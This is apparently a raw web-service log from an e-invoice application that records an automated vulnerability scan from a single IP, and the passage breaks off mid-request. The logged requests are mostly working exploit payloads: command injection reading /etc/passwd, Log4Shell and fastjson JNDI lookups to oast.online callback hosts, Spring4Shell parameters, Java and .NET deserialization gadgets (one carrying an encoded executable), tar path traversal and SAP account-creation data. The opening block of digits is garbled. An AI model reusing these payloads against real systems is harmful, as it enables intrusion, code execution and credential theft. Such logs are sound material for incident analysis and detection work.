10697118974710511147871141051161011147088104240761069711897471089711010347671049711483101113117101110991015941761069711897471051114787114105116101114591207109010089091105102108117115104120930111008909410138311697991077797112849798108101103012111511111510111410597108478011911010111451575652505148504850525153485110327612111511111510111410597108478011911010111451575652505148504850525153485159033020301040102605060107000208040101001101012000470101000542-7301-79000201300060100041014000120100050150980001019020020120006300030001-79000201300060100046014000320300010150980000010210220100010230240202500040102601019027020120007300040001-790002013000601000500140004204000101509800000102102201000102802902000103003103025000401026080410110101200081060200060-8903176-6904389-6904589-73046-72052-740561858-74064-74070-740741876-74074-74079-73082-69084891886-73087-74092-74095-7900010960003013020320002033017000100102035016091171130126011001-44-54-2-70-6600050027100302170237024702510161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015113-26105-1860109712410660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151037011111110127311011010111467108971151151011151037761211151111151011141059710847112971211081119710011547117116105108477197100103101116115367011111159101083111117114991017010510810110127197100103101116115461069711897120100117026103512111511111510111410597108471129712110811197100115471171161051084771971001031011161153670111111101610697118974710897110103477998106101991161020106971189747105111478310111410597108105122979810810110311211151111151011141059710847112971211081119710011547117116105108477197100103101116115033020301040102605060107000208010101001101012000470101000542-7301-79000201300060100054014000120100050150180002019000202001700010010202201609112116048011911011411211910120115125000102910697118971204612010910846116114971101151021111141094684101109112108971161011151201140231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-53201760110411603776106971189747108971101034711410110210810199116477311011811199971161051111107297110100108101114591201121151140501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912027601210910110998101114869710811710111511601576106971189747117116105108477797112597604116121112101116017761069711897471089711010347671089711511559120112115114017106971189746117116105108467297115104779711257-38-63-612296-47302700101081119710070979911611111473091161041141011151041111081001201126364000001211980001600011160810253975397544856113012608120118114029106971189712046120109108461161149711011510211111410946841011091121089711610111500000000000120112120
2022-07-12 22:47:22.8349|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:48:06.7384|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
2022-07-12 22:48:32.7231|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:48:55.4490|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
2022-07-12 22:48:59.1310|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
2022-07-12 22:49:02.8392|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
2022-07-12 22:49:33.7634|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:50:34.4585|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"user": {
"$func": "var_dump"
}
}
2022-07-12 22:50:41.0745|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:53:10.5841|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"org.apache.shiro.jndi.JndiObjectFactory",
"resourceName":"rmi://cb6o5meg2jqcit800010z61rydygwd5fa.oast.online/Exploit"
}
2022-07-12 22:53:13.9724|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
"jndiNames":"rmi://cb6o5meg2jqcit800010ph3bzt5f3bodz.oast.online/Exploit"
}
2022-07-12 22:53:14.5450|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 op=login&username=;`cat /etc/passwd`&password=
2022-07-12 22:53:17.2533|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
"metricRegistry":"rmi:/cb6o5meg2jqcit800010s5t8ds46xfskb.oast.online/Exploit"
}
2022-07-12 22:54:11.3172|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc
CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
userDetails
2022-07-12 22:54:19.6337|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:54:43.7310|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:55:19.8628|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:58:11.9595|INFO|EINVOICENET.WebService.ClsLog|::1
2022-07-12 22:58:16.5329|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:58:35.3038|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==
getUnsavedChanges
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHQAAHEAfgAFdAAFcHh0AC1jYjZvNW1lZzJqcWNpdDgwMDAxMGd3dXNydGJpenA5Y2gub2FzdC5vbmxpbmV4
rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=
2022-07-12 22:59:24.9333|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="file"; filename="poc.txt"
Content-Type: image/png
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
2022-07-12 23:00:19.6517|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:01:49.1264|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"email":"2BqZOcEVeuiOtSWSWUIqMaLMZmS@interact.sh","password":"2BqZOcEVeuiOtSWSWUIqMaLMZmS","username":"2BqZOcEVeuiOtSWSWUIqMaLMZmS"}
2022-07-12 23:01:52.9488|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:01:58.6654|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:02:02.4086|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:03:14.0390|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:03:41.7391|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:04:34.8525|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 c��H��
2022-07-12 23:05:57.8863|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 --871a4a346a547cf05cb83f57b9ebcb83
Content-Disposition: form-data; name="files"; filename="test.tar"
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 000000000000002BqZOgaLUxPzRyZ1nmYgdgtmRs3
--871a4a346a547cf05cb83f57b9ebcb83--
2022-07-12 23:06:42.9268|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:06:46.8666|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 class.module.classLoader.resources.context.configFile=https://cb6o5meg2jqcit800010ibbyx1zuszyae.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx
2022-07-12 23:08:00.5170|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:08:43.6824|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74002d6362366f356d6567326a716369743830303031303362686a6734386162346535632e6f6173742e6f6e6c696e6574000071007e00057400056874747073707874003568747470733a2f2f6362366f356d6567326a716369743830303031303362686a6734386162346535632e6f6173742e6f6e6c696e6578
2022-07-12 23:09:00.9213|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 _dlg[captcha][target]=system(\'ver\')\
2022-07-12 23:09:40.1831|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"UserName":"Administrator","Password":"2BqZOWsAZCwD2pG87jYMKPWeOTJ"}
2022-07-12 23:10:08.7549|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:10:29.3490|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:10:33.1614|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:10:40.3720|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e
2022-07-12 23:10:42.1950|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:10:46.0134|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:10:49.8158|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:12:25.9202|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:12:54.4584|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 username=${jndi:ldap://${hostName}.cb6o5meg2jqcit800010i44gcrjhc8jcs.oast.online/test}&password=
2022-07-12 23:13:48.7443|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}
2022-07-12 23:14:57.7259|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; 